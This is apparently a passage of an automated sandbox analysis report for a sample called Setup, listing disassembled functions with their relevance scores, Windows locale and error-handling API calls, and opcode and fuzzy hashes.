Opcode Fuzzy Hash: cff5fac4ad9c42e718b7a7895b35d62ecf3062177fa0ccb39492be870ed45f93
Instruction Fuzzy Hash: 30916DB19116058FDB18DF55E489AADBBF0FB4E324F28C52AD419EB298D3399940CF90

Function 031D71D0 Relevance: 1.7, APIs: 1, Instructions: 155COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03235040), ref: 031D7297

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: c85f3a0bc10483d9a5014f5f3a55558ffe4b1fe7a6f92eaa5fb04dd5133770db
Instruction ID: f232565d5144869d599cc8d9517ec43f2528613550105025c9e1b51552e38ada
Opcode Fuzzy Hash: c85f3a0bc10483d9a5014f5f3a55558ffe4b1fe7a6f92eaa5fb04dd5133770db
Instruction Fuzzy Hash: F5618F75940228AFCB20DF64CC89BD9B7B4FF49714F1442D9E649AB291EB706A84CF90

Function 02D568D4 Relevance: 1.6, Strings: 1, Instructions: 343COMMON

Download Yara Rule

Strings

,, xrefs: 02D56B39

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 0f11cef8659e58014098d17c6d0e9095f664197e8d5b10cab50c6b643f040214
Instruction ID: 3e536f6aa195359a0d8556d3c010544d79367815fdc22850b69f183407ddbd3e
Opcode Fuzzy Hash: 0f11cef8659e58014098d17c6d0e9095f664197e8d5b10cab50c6b643f040214
Instruction Fuzzy Hash: C5E18171A052AE8BCB24CB68CC407EDBB70EF15300F4446EAD959A7782D7719E94CFA1

Function 031A50F0 Relevance: 1.6, Strings: 1, Instructions: 343COMMON

Download Yara Rule

Strings

,, xrefs: 031A5355

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: b3b5061df6d8fef5ac7d4262558f2a7e70fffe612c657e9a8911deb9bcddeb19
Instruction ID: 43308ef44e3cf7115aa97d4598fa2c12454ef9f47d26ca801caead30949a9474
Opcode Fuzzy Hash: b3b5061df6d8fef5ac7d4262558f2a7e70fffe612c657e9a8911deb9bcddeb19
Instruction Fuzzy Hash: 02E1A175A0526A9FCB24CB58CC407ECFBB1AF1A300F0441EAD899B7642D7709E94CFA1

Function 02DAC9ED Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

0, xrefs: 02DACB5D

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0692d355fcf3cb6575e9487dd30f04021db30b2eafde17781c6b7aae12dcb265
Instruction ID: 3ea1f5ad2b763aca4f315c20db9c423685aa31b94010cd362ec4a4f7ab5018f4
Opcode Fuzzy Hash: 0692d355fcf3cb6575e9487dd30f04021db30b2eafde17781c6b7aae12dcb265
Instruction Fuzzy Hash: 33C1CE70A286068FCB25CF68C5B4E7ABBA2EF05328F14465BC493977A0D731ED45CB61

Function 031FB209 Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

0, xrefs: 031FB379

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d691737ca35f0cfdb0b26e8ba6056476b3f311731a5703343cbd040d3fdb8524
Instruction ID: 724ac01ec177b754df610b87c2c8a9d560cf4bec5880f3fe5413c74d1ce40123
Opcode Fuzzy Hash: d691737ca35f0cfdb0b26e8ba6056476b3f311731a5703343cbd040d3fdb8524
Instruction Fuzzy Hash: DAC1EE74508B068FCB28CF68C594A7EFBB2AF4D300F1CC659D6969B6A0C770E945CB91

Function 0320C000 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 03203639: GetLastError.KERNEL32(00000000,?,03209FF0), ref: 0320363D
Part of subcall function 03203639: SetLastError.KERNEL32(00000000,00000000,00000000,032351F0,000000FF), ref: 032036DF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0320C054

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: b2b6cb0714af78d8d7e5f8923c14eef7aa13826d9df0246beb7f151ce6020e9f
Instruction ID: a619e91e1fe7e18f250b95133c39e82e998b44d02552027c18f231290c358091
Opcode Fuzzy Hash: b2b6cb0714af78d8d7e5f8923c14eef7aa13826d9df0246beb7f151ce6020e9f
Instruction Fuzzy Hash: 7A21C8B6620227ABDB28EE54DD41A7A73ADEF04310B14417AED05CE1C1EB74D988DB50

Function 0320BC72 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 03203639: GetLastError.KERNEL32(00000000,?,03209FF0), ref: 0320363D
Part of subcall function 03203639: SetLastError.KERNEL32(00000000,00000000,00000000,032351F0,000000FF), ref: 032036DF

EnumSystemLocalesW.KERNEL32(0320BDA0,00000001), ref: 0320BCE4

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 592ce8497bc4ead19abbbce8f0922704cbeae301a4b482df6cd53f61001ea599
Instruction ID: 80583deb89a407719205cb2e16b6d64567770865f531c2dd536be227d041d9eb
Opcode Fuzzy Hash: 592ce8497bc4ead19abbbce8f0922704cbeae301a4b482df6cd53f61001ea599
Instruction Fuzzy Hash: 39114C3B2203059FDB28DF39D89067AB791FF80318B18442DD94747B81D771B886C740

Function 0320C22F Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 03203639: GetLastError.KERNEL32(00000000,?,03209FF0), ref: 0320363D
Part of subcall function 03203639: SetLastError.KERNEL32(00000000,00000000,00000000,032351F0,000000FF), ref: 032036DF

GetLocaleInfoW.KERNEL32(00000000,20000001,?,00000002,?,00000000,?,?,0320BFBC,00000000,00000000,?), ref: 0320C25B

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: c133d54916b6cec9bbce9c644ecf5a2f4db19dd417d0110555d001e2d7304a49
Instruction ID: 99345867f3dfb7d22b3c6227b5a8e10c661fa7c7ad22abb23d1a51df3c816ca6
Opcode Fuzzy Hash: c133d54916b6cec9bbce9c644ecf5a2f4db19dd417d0110555d001e2d7304a49
Instruction Fuzzy Hash: 48012B76620122AFDB2CDAA088456BA7758DB40354F094529DC06AB9D0DA70EDC5C590

Function 0320BD0D Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 03203639: GetLastError.KERNEL32(00000000,?,03209FF0), ref: 0320363D
Part of subcall function 03203639: SetLastError.KERNEL32(00000000,00000000,00000000,032351F0,000000FF), ref: 032036DF

EnumSystemLocalesW.KERNEL32(0320C000,00000001), ref: 0320BD57

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 36d44255ce23007e496568fdb19324f306ea65e0af9688a7593e5b41ecd86ea9
Instruction ID: 8ba483449501abbc9c3303459f1f31542f1e7637ccf7c0ed60bbec63c51c69e8
Opcode Fuzzy Hash: 36d44255ce23007e496568fdb19324f306ea65e0af9688a7593e5b41ecd86ea9
Instruction Fuzzy Hash: A6F0463A2103045FCB34DF359880B7ABB95EF80728F09802DE9414B6D1C6B19C82C610

Function 031EEE33 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,031E36E0,00000000,?,00000004,031E02C9,?,00000004,031E1351,00000000,00000000), ref: 031EEE50

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 985982a10e4be747ecb2b4be7fe119d4c809ce049bfb5beb1d4e7f7a99c81b52
Instruction ID: d2a0326ca3daa72af2510572b25c806b60b3843a6b229f61b340ee4f218d99f8
Opcode Fuzzy Hash: 985982a10e4be747ecb2b4be7fe119d4c809ce049bfb5beb1d4e7f7a99c81b52
Instruction Fuzzy Hash: A8E092377D0201BBEB29DB7CA91EF6AB69CD705A09F448545A502E90C5DBB2CA109271

Function 03203C8D Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 031FF5B1: RtlEnterCriticalSection.NTDLL(?), ref: 031FF5C0

EnumSystemLocalesW.KERNEL32(Function_00062C80,00000001,03233468,0000000C,032040B5,?), ref: 03203CC5

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: e85b17e17d05a15e0b960f275e96c023b61ce173febf4ab0f6643e1768557e90
Instruction ID: 4eb5b1946b85a54a6ae76ff20c4e383704a6691482f4a87da6d1cc8c16c1214e
Opcode Fuzzy Hash: e85b17e17d05a15e0b960f275e96c023b61ce173febf4ab0f6643e1768557e90
Instruction Fuzzy Hash: 03F04F7AA50304DFD700EF98E445B9C77B0EB09721F10802AEA10DB291C7B699448F51

Function 0320BC27 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 03203639: GetLastError.KERNEL32(00000000,?,03209FF0), ref: 0320363D
Part of subcall function 03203639: SetLastError.KERNEL32(00000000,00000000,00000000,032351F0,000000FF), ref: 032036DF

EnumSystemLocalesW.KERNEL32(0320BB80,00000001), ref: 0320BC5E

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 8d2dcc0b9356eb0385978b1b09bd2207c197f1026312ce8ef2ed6ae45eaa0500
Instruction ID: 140416ff497333a7bfbc69c9bc87dac2e21138aa5c4b61f4531f43a7871234df
Opcode Fuzzy Hash: 8d2dcc0b9356eb0385978b1b09bd2207c197f1026312ce8ef2ed6ae45eaa0500
Instruction Fuzzy Hash: 5CF0EC3D3002055BCB24EF35D85576A7F94EFC1750B4A4059EE058B691C671D886C790

Function 03204210 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,031FF087,?,20001004,00000000,00000002,?,?,031FE679), ref: 03204244

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 66f5ed1bb80862549a55173fec2498e50eb9ef9fb5f00162860584eeffe0cadc
Instruction ID: 6256d17606dd923818685378e38d711e9e5e5a4d932c1e7b67053c36897bddb2
Opcode Fuzzy Hash: 66f5ed1bb80862549a55173fec2498e50eb9ef9fb5f00162860584eeffe0cadc
Instruction Fuzzy Hash: 19E0483A550228BBCF127F62ED04A9D7E25EF54761F048010FD05561A5CBB189649AD4

Function 031D803E Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00037050,031D79C5), ref: 031D8043

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b99f09e40a9bf30aaa451ba570b3dd6969924d6c0892010b90869c04187989a3
Instruction ID: 2c0d7d7d352b0c50ae8512524d247e60dfc2ef1b7d8af2dc1590f264559fea0a
Opcode Fuzzy Hash: b99f09e40a9bf30aaa451ba570b3dd6969924d6c0892010b90869c04187989a3
Instruction Fuzzy Hash:

Function 02D50001 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

x), xrefs: 02D50311

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: x)
API String ID: 0-19961359
Opcode ID: 65e4d646a40ed02bd1ec093920f8669160df1d546fb7074b5b70d6377109b032
Instruction ID: e0f4125f3bb8bf4ba76dd1404fbb29f2e0de243f527776e77718e9123cd4e78e
Opcode Fuzzy Hash: 65e4d646a40ed02bd1ec093920f8669160df1d546fb7074b5b70d6377109b032
Instruction Fuzzy Hash: 9861DF739043248F9B49CFBAECA5A7637A3F785704742A63EC953DB168CF3059428AC5

Function 031BDED0 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

null, xrefs: 031BE06B

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID: null
API String ID: 0-634125391
Opcode ID: 70fbc7c58f6967319dfee14fb2b21e3ca5e9ea1c7890e6d14546e3e113c74a4d
Instruction ID: bdefc8f682cc37dfa29e64363970eb41f28077b5b01fb1193a75f4297b3ce4bb
Opcode Fuzzy Hash: 70fbc7c58f6967319dfee14fb2b21e3ca5e9ea1c7890e6d14546e3e113c74a4d
Instruction Fuzzy Hash: ED519930B006089BCA28EF68F4A17EDB7F9DB4D210F0445DEE84B8B6C0DF255A55CB92

Function 02DB2E77 Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fddac3d857f79d5a84b62810d3bf9cc1ebf1fb09415b94e6bfa58a0d68cb4e3
Instruction ID: 548e202dc9c01b2e1cae2c9a05b5c28faa764e92c8dae7b9d9361618cd8851db
Opcode Fuzzy Hash: 4fddac3d857f79d5a84b62810d3bf9cc1ebf1fb09415b94e6bfa58a0d68cb4e3
Instruction Fuzzy Hash: DE328B34E0020ADFCB19CF98C9A5AFEBBB5EF45304F1441A8D846A7345D732AE16DB90

Function 02D535E4 Relevance: .6, Instructions: 649COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6f7ffc1c26a17055db2c2b951e3ec8ecc0fce23b4e7f66a274c8a06c231446e
Instruction ID: df22770c30f65faeaf98afa8bd75def4056caa2ee1c8817aea35f5b2bc34d433
Opcode Fuzzy Hash: e6f7ffc1c26a17055db2c2b951e3ec8ecc0fce23b4e7f66a274c8a06c231446e
Instruction Fuzzy Hash: 815200709047648FCB69CF29C8D0AAABBF1FF86300F5505EDD99A4B762D771A980CB14

Function 031A1E00 Relevance: .6, Instructions: 649COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099911669caaffc945eedfaa813824ce892b8a649126706a1c46c8870ffca306
Instruction ID: 6ec4598159545e0e2d8fccfbb36632e206a07cbc3a5ab2fed49e51530ea8efd9
Opcode Fuzzy Hash: 099911669caaffc945eedfaa813824ce892b8a649126706a1c46c8870ffca306
Instruction Fuzzy Hash: 9252F334901B548FC729CF2DC9E0AA6BBB1FF4A301F5949EDC59A4B762D731A981CB10

Function 02D53F94 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9b006239a9958a019966b368873b8ca1a2ecce9190c9ba7726cdb2e54aa477
Instruction ID: 2dbb59e1666690f5c06db95931a29a89d1a90a0777e1c3b24ba8eac962bb1bef
Opcode Fuzzy Hash: 2f9b006239a9958a019966b368873b8ca1a2ecce9190c9ba7726cdb2e54aa477
Instruction Fuzzy Hash: 55222670901B208FCB24CF69C58066ABBF1FF85714B605A2DCAA797B50D3B1F985CB51

Function 031A27B0 Relevance: .5, Instructions: 499COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20fc93ae3a8ff337c2500ec558308210316e0b9b08756d3a122d9bdf319fa73a
Instruction ID: fc8241a3e47c08cac4125ff921a72d706d9fa71227963e0b40906c0523ec99f0
Opcode Fuzzy Hash: 20fc93ae3a8ff337c2500ec558308210316e0b9b08756d3a122d9bdf319fa73a
Instruction Fuzzy Hash: 79222178A01B108FC724CF2DC69066ABBF1FF89711B644E6DD6A697A90D331F946CB10

Function 02D56EA4 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5907baa6aa61c977add9a9c4716c18e54f67bc42efd09e2a59eab83d35fb377c
Instruction ID: bac18789a120efbe635ed13c15eba3135cccbec2ad8b78dbd558cd7c5706dbca
Opcode Fuzzy Hash: 5907baa6aa61c977add9a9c4716c18e54f67bc42efd09e2a59eab83d35fb377c
Instruction Fuzzy Hash: A7F128B1605B508FE724CF29C85476BB7E1FB88214F144A2DE9AA87790E7B5E804CB52

Function 02D79864 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47aac4bcd569f8eb9e6d20ce120a0f5f3cec5991d10a5286aa0929d64278ccf
Instruction ID: f311e9addbef6ddbeea1e384c491945cd70eb0b6f773da7895d99cef91cca2d6
Opcode Fuzzy Hash: d47aac4bcd569f8eb9e6d20ce120a0f5f3cec5991d10a5286aa0929d64278ccf
Instruction Fuzzy Hash: C4E10572E106298FDF08CF99D8A15EDBBB2BBC8310F1A816DD85667344DB346D05CB94

Function 031C8080 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47aac4bcd569f8eb9e6d20ce120a0f5f3cec5991d10a5286aa0929d64278ccf
Instruction ID: 663be749af22cc1427272998ff5e0b56255c9fa1fbf8b51d6488efa160e79b22
Opcode Fuzzy Hash: d47aac4bcd569f8eb9e6d20ce120a0f5f3cec5991d10a5286aa0929d64278ccf
Instruction Fuzzy Hash: D8E12672E106698FDF08CF99D8D15EDBBB2BFD8310B1A816DD81A67744CB306905CBA0

Function 02D64994 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 3fba6bd46ba5e00d84591e943660ae45b34cdf2e29d98a458084303305cef74b
Instruction ID: e4cc3e51e09e5941a3ed32f4322bccb143a1c3a7f65d0011d8fc44cf6c4afe56
Opcode Fuzzy Hash: 3fba6bd46ba5e00d84591e943660ae45b34cdf2e29d98a458084303305cef74b
Instruction Fuzzy Hash: 01024D70E103489BDF04EFA8C9197ADBBB2EF46314F20838DE0646B3D1DB764A459B91

Function 031B31B0 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ByteCharConcurrency::cancel_current_taskMultiWide
String ID:
API String ID: 1164694947-0
Opcode ID: 4a345de0ba46b49f149da3087ab0891f602be2d992f29165bd74f1ceba780231
Instruction ID: 297c957a2504265b329bdde52dc1d2c83ec78c47aa87680695ecce5eadb2b5db
Opcode Fuzzy Hash: 4a345de0ba46b49f149da3087ab0891f602be2d992f29165bd74f1ceba780231
Instruction Fuzzy Hash: 83023F70E10318DBDB14EFA4CA557DDBBB1AF4A318F20838DE0252F2D1DBB54A468B91

Function 02D64344 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 4a92f048097e26d9873f960ba8abf55dd9fbbc8a4799bdda7348b9c8793970de
Instruction ID: d7a2074e561f4f94c7f5ee282b619c9ccc23e733e4242488a357a1f20521aa68
Opcode Fuzzy Hash: 4a92f048097e26d9873f960ba8abf55dd9fbbc8a4799bdda7348b9c8793970de
Instruction Fuzzy Hash: 8B126930D00298DBDF15DF64C918BEDBBB1BF15308F2482D9D0482B292DBB55A89DFA1

Function 02D53F86 Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa119e962551f4dff5afdf421d10cce9a7751291de6802ce47c0ac7518f2a18d
Instruction ID: 53e88da70cdc9f5835e6a3a9c8af7da77f6e3c4a375bd704f2c6443dbc24d70e
Opcode Fuzzy Hash: fa119e962551f4dff5afdf421d10cce9a7751291de6802ce47c0ac7518f2a18d
Instruction Fuzzy Hash: 65F13670501B21CFCB24CF29C58066ABBF1FF45714B60892DDAA697B90D3B1F985CB51

Function 031A27A2 Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e82fbaa5c15901c005f3c39f4aebfb1b8396b599ee39b7c1ae7e6664e30407
Instruction ID: 49913f0ca2268ada6b651f6cc66a6057ba90bd7115dcab7dddecd423114d76b3
Opcode Fuzzy Hash: 78e82fbaa5c15901c005f3c39f4aebfb1b8396b599ee39b7c1ae7e6664e30407
Instruction Fuzzy Hash: 38F14278A01B118FC724CF2DC68066ABBF1FF88711B644E6DD6A697A90D331F586CB10

Function 02D53104 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da7258bdf34ee033e872ced38b54c25406d4706b4beecc139be1cbd7914a0eb8
Instruction ID: d9c4208ff2f418c6354c7a249fdec71abefa29544c2a0f15c73ce3aac43a2824
Opcode Fuzzy Hash: da7258bdf34ee033e872ced38b54c25406d4706b4beecc139be1cbd7914a0eb8
Instruction Fuzzy Hash: ABE16931A002698BDF68CF58D8907E9B7B1FF89344F5481E9DA4997340EB74AE95CF80

Function 031A1920 Relevance: .3, Instructions: 344COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de78d03185ef186dd0162d876266a6eb85425b6cd0176d9220f42fdc32904859
Instruction ID: 2cd075372a1235e7a928856ff33c3b2048c684c08b3d2650fcae25457df36d72
Opcode Fuzzy Hash: de78d03185ef186dd0162d876266a6eb85425b6cd0176d9220f42fdc32904859
Instruction Fuzzy Hash: 33E1A239A006299BDB28CF1CD8907E9B7B1FF89315F5981F9D94D97244EB309A85CF80

Function 02D57454 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29fbe75241ddd04e64427576302dc897e20b3eae6e502ce9a17ab3d2750f431e
Instruction ID: 353c86cb594d5f8319a62d42c991b2cc8260ed4c264777f57b51d4d746e5f7c9
Opcode Fuzzy Hash: 29fbe75241ddd04e64427576302dc897e20b3eae6e502ce9a17ab3d2750f431e
Instruction Fuzzy Hash: 8DD1AE31209B818FD725CF6CC88066AFFE1BF95200F548A5DE9E587752D774E908CBA2

Function 031A5C70 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d3c4330584cf66625d66b979b8690f9f99df4546b104dd0ab651a53dc27980
Instruction ID: 840c919fbacc007df689355e2ba982e6dae520e95ae88ed33798c1ada6c7da80
